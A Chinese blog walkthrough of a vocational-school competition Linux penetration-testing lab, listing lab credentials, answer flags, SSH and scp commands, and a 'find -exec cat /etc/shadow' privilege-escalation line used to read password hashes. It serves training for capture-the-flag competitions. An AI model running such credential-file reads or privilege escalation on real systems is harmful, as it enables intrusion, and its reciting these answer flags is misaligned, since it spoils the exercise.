中职组网络安全-linux渗透测试-Server2203(环境+解析)

已于 2024-06-11 10:51:08 修改
阅读量648 收藏 5
点赞数 8
文章标签: linux 安全
于 2023-11-25 15:11:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46056107/article/details/134615015
版权


任务环境说明:

服务器场景:Server2203(关闭链接)

用户名:hacker 密码:123456

1.使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

FLAG:2232

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

发现有报错,解决方法如下:

所以最终命令如下:

ssh -oKexAlgorithms=diffie-hellman-group1-sha1 hacker@172.16.102.250 -p 2232

FLAG:1doLfH31

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

FLAG:2.6.18

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

find 123 -exec cat /etc/shadow \;

FLAG:84pPxbiP

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

FLAG:darkman

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

使用命令

Scp -P 2232 -oKexAlgorithms=diffie-hellman-group1-sha1 root@172.16.102.250:/root/picture.png /root/1.png

下载到本地。

FLAG:HUCKGFFT

m0_46056107
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
2023年网络安全比赛--Linux渗透测试中职(超详细)
Aluxian_的博客
01-20 6240
2.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Flag值提交;)dirsearch。3.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag值提交;4.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为Flag值提交;
2022年浙江省中职“网络空间安全”赛项模块B--Linux渗透测试
Aluxian_的博客
11-14 1749
2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交;3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。
2022淮安市第十七届职业学校技能大赛网络安全题解WP
明裕学长的博客
11-04 2589
这题没要求版本号,只要求端口号,可以用-sS,要全面再加上-p-nmap-p--sSFlag[22;111;6000]2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;先对恶意用户进行爆破。
2024年浙江省中职“网络空间安全”赛项模块B--Linux渗透测试_中职 网络安全 b模块 linux渗透
2401_84248681的博客
04-26 468
二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值第①阶段:单兵模式系统渗透测试任务一:Windows操作系统渗透测试任务二:Linux操作系统渗透测试任务三:Linux系统渗透提权任务四:私钥暴力破解攻击任务五:编码信息获取任务六:逆向分析及隐写备战阶段 休息20分钟第②阶段:分对抗 系统加固 15分钟渗透测试 45分钟三、竞赛任务书内容(一)拓扑图**
2022年江西省中职“网络空间安全”赛项模块B-Web渗透测试
Aluxian_的博客
01-15 3908
2022年中职山西省“网络空间安全”赛项B-8:Web渗透测试任务书B-8:Web渗透测试解析不懂可以私信博主! 一、竞赛时间 420分钟 共计7小时 吃饭一小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 系统漏洞利用与提权 任务二: Linux操作系统渗透测试 任务三: 应用服务漏洞扫描与利用 任务四: SQL注入测试(PL) 任务五: 应急响应 任务六: 流量分析 任务七: 渗透测试 任务八: Web渗透测试 任务九:Windows操作系统
2022年浙江省中职“网络空间安全”赛项模块B--Windows渗透测试
Aluxian_的博客
12-01 2613
2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;服务器场景:Server2003(开放链接)
2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
热门推荐
Aluxian_的博客
05-11 1万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器系
2021年江苏省职业院校技能大赛中职 网络信息安全赛项试卷--web安全渗透测试解析
Aluxian_的博客
12-28 5119
2021年江苏省Web安全渗透测试 任务环境说明: 服务器场景: 服务器场景操作系统:未知 服务器场景用户名:未知 密码:未知 1.通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 2.通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 3.通过浏览器访问http://靶机服务器I
中职网络安全2023年山东省省赛Linux 系统渗透提权
qq_57147160的博客
01-03 3975
2023年山东省赛
2022年中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境
07-06
【标题】"2022年中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境"涉及的是网络安全领域中的代码渗透测试,这是在中职教育阶段一项重要的技能竞赛,旨在提升学生的网络安全实战能力。磐云杯是这类竞赛的...
网络安全-Windows操作系统渗透测试-中高职业院校(视频教程解析
12-18
通过本项目竞赛,使中职学生能熟练运用网络信息安全技术 对网络、操作系统、应用、服务器等目标进行信息和数据安全防 护与渗透,具有分析、处理现场安全问题的能力,促进学生团队 协作实践能力,引导中等职业学校...
P10-经典赛题-Linux操作系统渗透测试.docx
03-29
中职网络安全赛题解析,P10-经典赛题-Linux操作系统渗透测试,MySQL数据库弱口令,nc高位端口链接
2022年中职网络安全”赛项广西竞赛任务书-B模块
05-04
在这个赛项中,B 模块主要测试了参与者的网络安全知识和技能,包括 SSH 弱口令渗透测试Linux 操作系统渗透测试、远程代码执行渗透测试等多个方面。 下面是对 B 模块中每个任务的详细解释和知识点总结: B-1 SSH...
中职网络安全竞赛-隐藏信息探索-web2-自己建立的题目环境
06-02
适用人群:参加中职网络安全竞赛的学生和老师 使用环境:使用phpstudy2016配置环境。通过测试。其中第5关需要数据库。把压缩包中的newsql目录复制到phpstudy/mysql/data中即可。mysql数据库用户名和密码是root/root...
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 376
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
linux上导出数据库
weixin_43652507的博客
07-24 329
linux上导出数据库 MySQL、PostgreSQL、SQLite、MongoDB
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4476
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
Linux中vim的基本介绍和使用
2301_79194984的博客
07-24 1261
如果我面想要在Linux上编写代码的话,我就需要vim来帮助我们编写代码。但是vim并不像是在Windows上的vs集成软件把所有的东西都集成起来但是呢,如果不进行配置的话,vim和其他是相互独立的,vim就是写代码的编辑器,编译代码就是gcc/g++的编译器,调试代码就有gdb的调试器。自动化构建就有make和makefile构建的工具。vim是款编辑器,同时也是多模式的编辑器—命令模式,底行模式,插入模式。简单编译一个hello vim程序。
2021全国中职网络安全竞赛模拟题(含解析)-安全加固与事件响应
本次提供的文档是关于2021年全国职业院校技能大赛(中职网络安全竞赛的模拟卷第3题,总分为100分,分为四个模块:A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

m0_46056107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值